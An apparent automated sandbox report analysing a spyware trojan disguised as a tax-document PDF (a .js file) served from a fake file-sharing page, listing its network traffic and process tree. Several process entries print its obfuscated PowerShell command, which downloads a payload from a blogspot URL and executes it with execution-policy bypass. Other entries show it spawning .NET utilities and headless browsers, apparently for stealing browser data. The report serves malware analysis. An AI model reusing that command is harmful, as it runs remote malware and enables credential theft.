            Source: global traffic | DNS traffic detected: DNS query: beacons.gcp.gvt2.com
            Source: global traffic | DNS traffic detected: DNS query: ntp1.hetzner.de
            Source: global traffic | DNS traffic detected: DNS query: ntp.time.in.ua
            Source: global traffic | DNS traffic detected: DNS query: gbg1.ntp.se
            Source: global traffic | DNS traffic detected: DNS query: time.google.com
            Source: global traffic | DNS traffic detected: DNS query: x.ns.gin.ntt.net
            Source: global traffic | DNS traffic detected: DNS query: ntp.time.nl
            Source: global traffic | DNS traffic detected: DNS query: ntp.nict.jp
            Source: global traffic | DNS traffic detected: DNS query: beacons.gvt2.com
            Source: global traffic | DNS traffic detected: DNS query: beacons2.gvt2.com
            Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
            Source: global traffic | DNS traffic detected: DNS query: beacons3.gvt2.com
            Source: global traffic | DNS traffic detected: DNS query: beacons4.gvt2.com
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Fri, 14 Mar 2025 17:34:11 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 356
                Connection: close
                x-amz-request-id: V6P4J6QBD4Y9306W
                x-amz-id-2: H2IWfleTcIS9l5f5CDzFeQ9eM/lu7ODZz3PYvC/PZpIyTqZcWNXFwObe3GVpiIOHnnyYsuPh1Qw=
                Content-Security-Policy: default-src * data: filesystem: about: blob: ws: wss:; script-src * 'unsafe-eval' 'unsafe-inline'; style-src * 'unsafe-inline';
                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                X-CDN: Imperva
                X-Iinfo: 40-26250982-26251030 NNNY CT(10 20 0) RT(1741973651373 315) q(0 0 0 -1) r(0 1) U24
            Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknown | Network traffic detected: HTTP traffic on port 49695 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49695
            Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49673
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknown | Network traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49679 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknown | HTTPS traffic detected: 3.125.36.175:443 -> 192.168.2.16:49707 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 3.125.36.175:443 -> 192.168.2.16:49708 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.18.186.31:443 -> 192.168.2.16:49713 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49712 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 45.223.17.158:443 -> 192.168.2.16:49721 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.250.185.132:443 -> 192.168.2.16:49720 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 45.223.17.158:443 -> 192.168.2.16:49723 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49726 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49727 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 151.101.193.229:443 -> 192.168.2.16:49733 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49734 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 151.101.193.229:443 -> 192.168.2.16:49732 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49739 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49746 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49745 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49748 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49744 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49747 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49749 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49751 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49750 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49752 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.16:49757 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.16:49759 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.2.16:49807 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 192.168.2.16:49807 -> 185.208.159.170:443 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.2.16:49812 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.2.16:49813 version: TLS 1.2
            Source: Yara match | File source: 00000023.00000003.1909090496.0000000004CF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000003.1903171311.0000000004AD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf.js | File download: blob:https://securefilepro.netlify.app/f891a372-5ba2-4c2d-90be-57fcf2d0e4db
            Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
            Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir6252_1491670841
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir6252_1491670841
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 936
            Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.win@91/58@92/214
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\Downloads\fd870463-4b90-4d4c-95db-b7afc2afd181.tmp
            Source: C:\Windows\System32\svchost.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
            Source: C:\Windows\SysWOW64\dllhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-7afd42d6-8c92-f86992-2a41c6d1ecb2}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4umvs3r.fjx.ps1
            Source: C:\Windows\System32\svchost.exe | System information queried: HandleInformation
            Source: C:\Windows\SysWOW64\dllhost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\SysWOW64\dllhost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,15029846499362184093,17269988125576325568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
            Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,15029846499362184093,17269988125576325568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 936
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 940
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 816
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 680
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\System32\dllhost.exe"
            Source: C:\Windows\SysWOW64\dllhost.exe | Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\System32\dllhost.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 940
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 936
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 680
            Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Temp\user-PC-20250307-1017.log
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr357C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/c6c2e3f9"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2316,i,14866277002353003105,15716734756151876631,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:3
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr5152.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/d8d6519b"
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=1996,i,2173057654512074534,17827567997929056838,262144 /prefetch:3
            Source: C:\Windows\SysWOW64\dllhost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr357C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/c6c2e3f9"
